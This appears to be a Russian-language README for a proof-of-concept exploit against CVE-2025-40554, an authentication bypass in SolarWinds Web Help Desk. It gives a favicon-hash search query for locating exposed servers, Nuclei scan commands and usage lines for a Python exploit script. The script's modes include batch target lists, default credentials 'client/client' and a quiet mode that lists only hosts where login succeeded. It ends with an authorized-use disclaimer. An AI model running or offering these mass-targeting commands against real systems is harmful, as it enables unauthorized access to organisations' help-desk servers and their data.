
Эксплойт для доказательства концепции для CVE-2025-40554, обход аутентификации в SolarWinds Web Help Desk. Включает шаблон Nuclei и эксплойт на Python для тестирования одиночных или пакетных целей с опциональным входом по учетным данным.
http.favicon.hash:"1895809524"
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt
Одиночная цель (обход + вход, по умолчанию client/client):
python3 exploit_auth_bypass.py -t https://TARGET:8443
Одиночная цель с пользовательскими учетными данными:
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass
Одиночная цель, только обход (без входа):
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
Список целей (сохраняет только уязвимые+вход):
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
Список целей с пользовательскими учетными данными:
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret
Тихий режим (выводить только URL-адреса, где вход выполнен успешно):
python3 exploit_auth_bypass.py -l result_all.txt -q
Этот PoC предназначен только для авторизованных исследований и тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным. Авторы не несут ответственности за неправомерное использование.